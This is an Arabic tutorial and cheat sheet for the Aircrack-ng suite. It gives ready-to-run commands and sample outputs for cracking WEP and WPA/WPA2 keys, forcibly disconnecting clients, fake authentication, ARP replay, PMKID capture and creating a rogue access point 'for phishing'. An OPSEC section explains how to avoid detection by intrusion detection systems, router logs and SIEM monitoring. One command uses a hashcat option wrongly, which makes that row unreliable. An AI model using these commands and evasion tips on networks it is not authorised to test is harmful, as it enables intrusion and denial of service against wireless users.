“تُعد Aircrack-ng أداة سريعة وفعالة لاختبار أمان شبكات Wi-Fi، وتتميز بوظائف واسعة النطاق ودعم قوي من المجتمع التقني.” — تشارلي ميلر
معلومات الأداة
| الخاصية | التفاصيل |
|---|---|
| الاسم | Aircrack-ng |
| الاستخدام | تقييم واختبار أمان شبكات Wi-Fi (WEP / WPA / WPA2) |
| المنصات | Linux، Windows، macOS |
| النوع | مجموعة أدوات مفتوحة المصدر (Suite) |
ما هو الغرض من Aircrack-ng؟
Aircrack-ng هي مجموعة أدوات مفتوحة المصدر صُممت لتقييم واختبار أمان شبكات Wi-Fi. وفيما يلي الاستخدامات الرئيسية لها:
التقاط الحزم وحقنها (Packet Capture and Injection): تقوم Aircrack-ng بالتقاط الحزم (packets) من شبكة Wi-Fi، مما يتيح تحليلاً مفصلاً لحركة مرور البيانات. كما تدعم الأداة ميزة حقن الحزم، وهي ضرورية لاختبار أمان الشبكة وإجراء اختبارات الاختراق.
كسر تشفير WEP وWPA/WPA2-PSK: يمكن للأداة كسر مفاتيح WEP وكلمات مرور WPA/WPA2-PSK باستخدام الحزم الملتقطة وتنفيذ هجمات القوة الغاشمة (brute force) أو هجمات القاموس (dictionary attacks)، مما يساعد المستخدمين على تحديد ممارسات التشفير الضعيفة.
مراقبة الشبكة: تتضمن Aircrack-ng أدوات لمراقبة الشبكة في الوقت الفعلي، مما يسمح للمستخدمين بمتابعة نشاط الشبكة، وتحديد الأجهزة المتصلة، وتصدير البيانات إلى ملفات نصية لمزيد من المعالجة بواسطة أدوات خارجية.
متجهات الهجوم: تشمل هجمات إعادة التشغيل (replay attacks)، وفصل المصادقة (deauthentication)، ونقاط الوصول الوهمية، وغيرها من خلال حقن الحزم. تتيح عملية حقن الحزم للمستخدمين معرفة حقيقة الأنشطة الجارية؛ بالإضافة إلى ذلك، تلعب هجمات Aircrack-ng دوراً فعالاً في عمليات فصل المصادقة.
التوافق: تتوافق أداة Aircrack-ng مع أنظمة تشغيل متعددة مثل Linux وWindows وmacOS، مما يتيح استخدامها من قبل شريحة أوسع من المستخدمين وفي بيئات عمل متنوعة.
الميزات الأساسية
- كسر تشفير WEP وWPA/WPA2
- التقاط الحزم
- مراقبة الشبكة
- حقن الحزم
- هجمات القاموس وقوائم الكلمات (Wordlists)
- هجمات فصل المصادقة (Deauthentication)
- هجمات إعادة التشغيل (Replay Attacks)
- تحليل الشبكة والإحصائيات
مصادر البيانات
- الحزم الملتقطة
- ملفات المصافحة (Handshake Files)
- قوائم الكلمات (Wordlists)
- عمليات مسح الشبكة
- طلبات واستجابات الاستكشاف (Probe Requests and Responses)
- إطارات فصل المصادقة (Deauthentication Frames)
التثبيت
الأداة متوفرة افتراضياً في أغلب توزيعات اختبار الاختراق مثل Kali Linux وParrot OS. في حال عدم توفرها:
sudo apt update && sudo apt install aircrack-ng
أوامر Aircrack-ng الشائعة
1. التقاط الحزم
يقوم هذا الأمر بالتقاط الحزم من واجهة لاسلكية محددة وحفظها في ملف معين.
airodump-ng <interface>
2. كسر مفتاح WEP
يقوم هذا الأمر بكسر مفتاح WEP باستخدام الحزم الملتقطة. يمكن استخدام الهجمات التشفيرية للكشف عن كلمة المرور الفعلية.
aircrack-ng -b <BSSID> <capture_file>
2.1 لماذا نستخدم إعادة تشغيل طلبات ARP
يعتمد تشفير WEP في تصميمه على متجه تهيئة (Initialization Vector - IV) قصير لا يتجاوز طوله 24 بت. عند تكرار نفس قيمة الـ IV مع نفس مفتاح التشفير، يصبح من الممكن استخراج المفتاح رياضياً من خلال تحليل إحصائي للحزم المتكررة, وهذه هي نقطة الضعف الجوهرية في WEP. في ظل الاستخدام الطبيعي للشبكة، لا يتم توليد عدد كافٍ من الحزم بالسرعة المطلوبة، مما يعني أن جمع العدد اللازم من قيم IV المتكررة قد يستغرق ساعات. هنا يأتي دور هجوم إعادة تشغيل طلبات ARP: بدلاً من انتظار حركة المرور الطبيعية، يقوم هذا الهجوم بإعادة إرسال حزمة ARP ملتقطة مسبقاً بشكل متكرر وسريع إلى نقطة الوصول. تقوم نقطة الوصول بالرد على كل حزمة معادة بحزمة جديدة تحمل قيمة IV مختلفة، مما يؤدي إلى توليد آلاف الحزم خلال ثوانٍ معدودة بدلاً من ساعات. بعبارة أخرى، الهدف من هذا الهجوم ليس حقن بيانات ضارة، بل تسريع عملية تجميع قيم IV اللازمة لكسر المفتاح؛ فكلما زاد عدد الحزم الملتقطة خلال فترة زمنية أقصر، أصبحت عملية كسر المفتاح باستخدام aircrack-ng أسرع وأكثر كفاءة.
3. كسر مفتاح WPA/WPA2-PSK
يقوم هذا الأمر بكسر مفتاح WPA/WPA2-PSK باستخدام قائمة كلمات (wordlist) وعملية المصافحة (handshake) التي تم التقاطها. حيث يحاول مطابقة مفتاح كلمة المرور الملتقط مع عبارات المرور المحتملة الموجودة في القائمة.
aircrack-ng -w <wordlist> -b <BSSID> <capture_file>
4. وضع المراقبة (Monitor Mode)
يُفعّل هذا الأمر وضع المراقبة على واجهة الشبكة اللاسلكية المحددة. يُعد وضع المراقبة ضرورياً لقراءة وعرض جميع الحزم (packets) المارة عبر الرابط اللاسلكي.
airmon-ng start <interface>
5. إلغاء مصادقة العملاء (Deauthentication)
يقوم هذا الأمر بإلغاء مصادقة العملاء المتصلين بنقطة الوصول (Access Point) بهدف التقاط عملية المصافحة؛ وبعبارة أخرى، يقوم بفصل العملاء قسرياً عن الشبكة. مما يدفعهم لمحاولة إعادة الاتصال، وبالتالي يمنحك فرصة لالتقاط المصافحة ومحاولة اختراق الشبكة.
aireplay-ng --deauth <count> -a <BSSID> -c <client_MAC> <interface>
6. المصادقة الوهمية (Fake Authentication)
يوفر هذا الأمر مصادقة وهمية مع نقطة الوصول. يساعد ذلك في الارتباط (association) بنقطة الوصول دون معرفة كلمة مرور صحيحة؛ وغالباً ما تكون هذه الخطوة شرطاً مسبقاً لهجمات أخرى لاحقة.
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <MAC_address> <interface>
7. إعادة تشغيل طلبات ARP (ARP Request Replay)
ينفذ هذا الأمر هجوم إعادة تشغيل طلبات ARP (بروتوكول تحليل العنوان) لتوليد حركة مرور بيانات (traffic). تجعل حركة المرور هذه عملية كسر مفاتيح WEP أسهل وأسرع، مما يزيد من فعالية أداة Aircrack-ng.
aireplay-ng -3 -b <BSSID> -h <MAC_address> <interface>
8. اختبار حقن الحزم (Packet Injection Test)
يختبر هذا الأمر قدرة الواجهة اللاسلكية على حقن الحزم. يُعد نجاح عملية حقن الحزم أمراً بالغ الأهمية لتنفيذ هجمات الاتصال بالشبكة.
aireplay-ng -9 <interface>
9. إيقاف وضع المراقبة
يؤدي هذا الأمر إلى إيقاف وضع المراقبة على أي واجهة لاسلكية، وإعادة الواجهة إلى وضع الإدارة (managed mode) لتعود للعمل بشكل طبيعي ضمن الشبكة. تُعتبر هذه الخطوة بمثابة المرحلة النهائية للهجوم، حيث يتوقف البرنامج عن العمل.
airmon-ng stop <interface>
10. المساعدة ومعلومات الاستخدام
يعرض هذا الأمر قائمة المساعدة ومعلومات الاستخدام الخاصة بـ Aircrack-ng، كما يقدم نظرة عامة على الخيارات المتاحة وصيغة كتابة الأوامر.
aircrack-ng -h
صيغة استخدام بديلة:
aircrack-ng --help
أمثلة على مخرجات أوامر Aircrack-ng
| الأمر | مثال على الاستخدام | الوظيفة | مثال على المخرجات |
|---|---|---|---|
| وضع المراقبة (Monitor Mode) | airmon-ng start wlan0 | تفعيل وضع المراقبة على الواجهة wlan0. | تم ضبط الواجهة wlan0 على وضع المراقبة في القناة 6 |
| إيقاف وضع المراقبة | airmon-ng stop wlan0 | إيقاف وضع المراقبة على الواجهة wlan0. | تم ضبط الواجهة wlan0 على وضع الإدارة (managed mode) |
| التقاط الحزم | airodump-ng wlan0 | التقاط الحزم عبر الواجهة wlan0. | CH 9 ][ Elapsed: 10 s ][ 2024-08-07 18:25 ]BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSIDAA:BB:CC:DD:EE:FF -30 10 20 0 6 54e WPA2 CCMP PSK MyNetwork |
| استخدام قناة محددة | airodump-ng --channel 6 wlan0 | التقاط الحزم على قناة محددة. | CH 6 ][ الوقت المنقضي: 10 ثوانٍ ][ 2024-08-07 18:25 ] |
| بدء التقاط مصافحة WPA | airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0 | التقاط مصافحة WPA لكسر التشفير لاحقاً. | بانتظار الحزم… |
| إلغاء مصادقة العملاء | aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 00:11:22:33:44:55 wlan0 | إلغاء مصادقة العملاء من نقطة الوصول. | إرسال 64 حزمة إلغاء مصادقة (DeAuth) موجهة. عنوان MAC للعميل: [00:11:22:33:44:55] |
| مصادقة وهمية | aireplay-ng -1 0 -e MyNetwork -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0 | إجراء مصادقة وهمية مع نقطة الوصول. | تم الارتباط بنجاح :-) |
| اختبار حقن الحزم | aireplay-ng -9 wlan0 | اختبار قدرات حقن الحزم. | عملية الحقن تعمل! |
| إعادة إرسال طلب ARP | aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0 | تنفيذ هجوم إعادة إرسال طلب ARP. | يبدو أن نقطة الوصول تتجاهل الحزم بطول: 68 |
| بدء هجوم WEP | aircrack-ng -b AA:BB:CC:DD:EE:FF -w wordlist.txt capture.cap | بدء هجوم WEP باستخدام قائمة كلمات (wordlist). | محاولة كسر مفتاح WEP… |
| كسر مفتاح WEP | aircrack-ng -b AA:BB:CC:DD:EE:FF capture.cap | كسر مفتاح WEP باستخدام ملف الالتقاط. | تم العثور على المفتاح! [ 12:34:56:78:90 ] |
| كسر مفتاح WPA/WPA2-PSK | aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture.cap | يكسر مفتاح WPA/WPA2-PSK باستخدام قائمة كلمات (wordlist). | عبارة المرور غير موجودة في القاموس / تمت قراءة 100,000 حزمة… |
| التقاط PMKID لـ WPA/WPA2 | hcxdumptool -i wlan0 -o capture.pmkid | يلتقط PMKID لغرض كسر تشفير WPA/WPA2. | PMKID: XX:XX:XX:XX:XX:XX |
| استخدام قيم التجزئة المحسوبة مسبقاً | aircrack-ng -m 2500 -b AA:BB:CC:DD:EE:FF -w hashes.txt capture.cap | يستخدم قيم التجزئة المحسوبة مسبقاً لكسر تشفير WPA/WPA2. | جاري الكسر باستخدام قيم التجزئة المحسوبة مسبقاً… |
| إنشاء نقطة وصول وهمية | airbase-ng -e MyNetwork -c 6 wlan0 | ينشئ نقطة وصول وهمية لأغراض التصيد. | بدء تشغيل نقطة الوصول الوهمية… |
| هجوم الحقن (Injection) على WEP | aireplay-ng -2 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0 | يرسل حزم حقن لتنفيذ هجوم على WEP. | تمت عملية الحقن بنجاح! |
ملاحظات OPSEC
أدوات الحماية اللي ممكن تكشف نشاطك:
- WIDS/WIPS (أنظمة كشف ومنع التسلل اللاسلكي): أغلب الشركات المتوسطة والكبيرة عندها نقاط وصول أو أجهزة مخصصة بترصد نشاط الطبقة اللاسلكية مباشرة. هاي الأنظمة مبنية أصلاً لالتقاط أنماط زي حزم Deauth المتكررة أو محاولات المصادقة الوهمية.
- سجلات نقطة الوصول/الراوتر (Logs): حتى الأجهزة المنزلية أو شبه المؤسسية بتسجل أحداث زي فصل عميل مفاجئ، محاولات ارتباط فاشلة متكررة، أو ظهور MAC address جديد يحاول Fake Authentication.
- أدوات مراقبة على جهاز الضحية نفسه: إذا العميل (Client) عليه EDR أو حتى نظام تشغيل حديث، ممكن يلاحظ انقطاع الاتصال المتكرر ويظهر تنبيه للمستخدم أو يسجله بسجلات النظام.
- أنظمة SIEM مركزية: بالبيئات المؤسسية، لوجات نقاط الوصول غالباً متجمعة بمكان مركزي، وأي نمط شاذ من نوع “عدد كبير من محاولات Deauth بفترة قصيرة” بيطلع كتنبيه (Alert) جاهز.
مستوى الضجيج لكل تقنية:
| التقنية | مستوى الضجيج | ليش |
|---|---|---|
airodump-ng (التقاط سلبي) | هادئ جداً | مجرد استماع للترافيك المار بالهواء، بدون أي إرسال أو تفاعل مع الشبكة — يصعب كشفه |
التقاط PMKID (hcxdumptool) | هادئ نسبياً | ما بيحتاج تفاعل مع عميل حقيقي، بيتم غالباً بطلب واحد لنقطة الوصول |
aireplay-ng --deauth | صاخب جداً | إرسال دفعات حزم Deauth مكثفة بوقت قصير — نمط واضح ومباشر تلتقطه أغلب أنظمة WIDS فوراً |
ARP Request Replay (-3) | صاخب | حجم كبير من الحزم المتكررة بفترة قصيرة، ملحوظ على مستوى حركة المرور (Traffic Volume) |
Fake Authentication (-1) | متوسط | محاولة ارتباط واحدة أو محاولات قليلة، لكن قد تُسجَّل كمحاولة اتصال فاشلة أو مشبوهة |
Rogue AP (airbase-ng) | صاخب على المدى الطويل | وجود SSID مكرر أو BSSID غريب بنفس الاسم قابل للكشف بسهولة عبر مقارنة الأجهزة المصرح بها |
كيف نقلل الأثر:
- تفضيل الالتقاط السلبي (Passive Capture) أو تقنية PMKID كلما أمكن، بدل الاعتماد المباشر على Deauth.
- تقليل عدد حزم Deauth المرسلة لأقل قدر ممكن يحقق الهدف (مثلاً محاولة أو محاولتين بدل عشرات)، بدل إرسال دفعات كبيرة دفعة وحدة.
- إضافة فواصل زمنية بين المحاولات المتكررة بدل تنفيذها بشكل متلاحق ومكثف، لتفادي الأنماط اللي بتلفت نظر أنظمة الرصد.
- تجنب ترك نقطة وصول وهمية (Rogue AP) شغالة لمدة طويلة أكثر من اللازم لتقليل احتمال ملاحظتها.
أدوات
aircrack-ng— كسر تشفير WEP/WPA/WPA2airodump-ng— التقاط الحزم ومراقبة الشبكةairmon-ng— إدارة وضع المراقبةaireplay-ng— حقن الحزم، Deauth، Fake Auth، ARP Replayairbase-ng— إنشاء نقاط وصول وهميةhcxdumptool— التقاط PMKID